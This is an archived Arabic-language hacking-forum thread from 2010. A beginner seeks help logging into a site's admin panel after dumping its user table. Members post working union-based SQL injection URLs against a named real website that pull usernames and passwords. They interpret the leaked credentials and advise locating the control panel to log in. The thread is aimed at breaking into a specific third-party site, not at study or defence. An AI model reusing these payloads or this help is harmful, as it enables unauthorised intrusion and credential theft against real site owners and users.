:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   مشكله في الدخول لوحه التحكم (http://www.vbspiders.com/vb/t26603.html)

xoxoxo10 03-30-2010 11:23 PM

مشكله في الدخول لوحه التحكم
 
السلام عليكم

انا ي خوان بعد عملت استعلام عن العمود المصاب group_concat(userID,0x3a,userName,0x3a,userPasswor d)conact

طلع لي هذا
1:successful:success224,2:3246913:5476

ولما ادخل اليوز و الباس يعطيني ان اليوز او الباس غلط؟

وتمنى احد يشرحلي 1:successful:success224,2:3246913:5476


اعذروني ثرى انا مبتدء

Tr0j4n 03-30-2010 11:53 PM

طيب ممكن تعطيني الموقع

M!M0 03-30-2010 11:57 PM

ممكن رابط الإستغلال عشان أشرحلك جيدا

T3BaN_HaCkEr 03-31-2010 12:41 AM

يا الغالي انت ليش مغلب نفسك

ما تحط امر الي يستخرج رقم العضوية

حط امر استخراج اليوزر والباسورد على شان تسهل على نفسك

هيك يعني

group_concat(userName,0x3a,userPassword)

وبعدها لما تطلع المعلومات

بتدخل لوحة التحكم .. لو ما دخل معك بكون هذا مش الادمن

أو انو لوحة التحكم فيها مشكلة

ولو تعطينا الموقع او الاستغلال بكون احسن


xoxoxo10 03-31-2010 01:39 AM

طيب انا سويت مثل ما قلت وطلع لي هذا
1:successful:success224,2:3246913:5476

M!M0 03-31-2010 02:40 AM

الرابط عشان أفهمك جيد

لأن هذا هو اليوزر الأول successful

والباس
success224

والأمور الأخرى لم أفهمها لماذا

ممكن يوزر آخر وباس آخر

لهذا طلبت منك الرابط عشان أفهمهم


xoxoxo10 03-31-2010 04:12 PM

تفضل هذا رابط الموقع والتعديلات الي سويتها فيه
كود PHP:

http://www.sflcn.com/story.php?id=-8091+union+select+1,2,group_concat%28userID,0x3a,userName,0x3a,userPassword%29conact,4,5,6,7,8+from+users-- 


anasdu01 03-31-2010 04:59 PM

جربت و طلعلي
successful:success224,3246913
ولما تعمل group_concat
بيطلع successful:success224,3246913:5476

xoxoxo10 03-31-2010 05:19 PM

طيب يا خي نفس الي صار معي

xoxoxo10 04-01-2010 07:18 PM

up

x-men-ma 04-02-2010 06:53 PM

السلام عليكم

تقبل تدخلي المتواضع لمساعدتك

أخي الكريم اذا تبغت دورة الاخ فولكانو ولاحظت جيدا
ستجد الدرس العاشر مفصل جيدا وهدا هو
..:^_^+ {10}---{4}الوصول للجدول الصحيح بالحقنه{4}---{10}
+^_^:..
لاحظ ان الاخ فولكانو لم استخرج البينات
مسح الذي فيه عرذ اليوزرا وهو userid
يجب ان يكون الاستغلال
roup_concat(user,0x3a,password,0x3a,ema)il)
اذا وجد هذا الاميل ولا سيكون
سيكونroup_concat(user,0x3a,password

synyster-hacker 04-09-2010 07:07 PM

كود PHP:

http://www.sflcn.com/story.php?id=-8091+union+select+1,2,userName,4,userPassword,6,7,8+from+users-- 


SicKxTricK 04-20-2010 12:09 AM

السلام عليكم اخي الموقع سهل جدا

يعني يوجد باسوردين ويوزرين

لكن لما يقولك ان الباس واليوزر غلط لان تحطه بالسي بانل انت حاول تبحث عن لوحة التحكم يالغالي
بالتوفيق لك


الساعة الآن 12:16 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0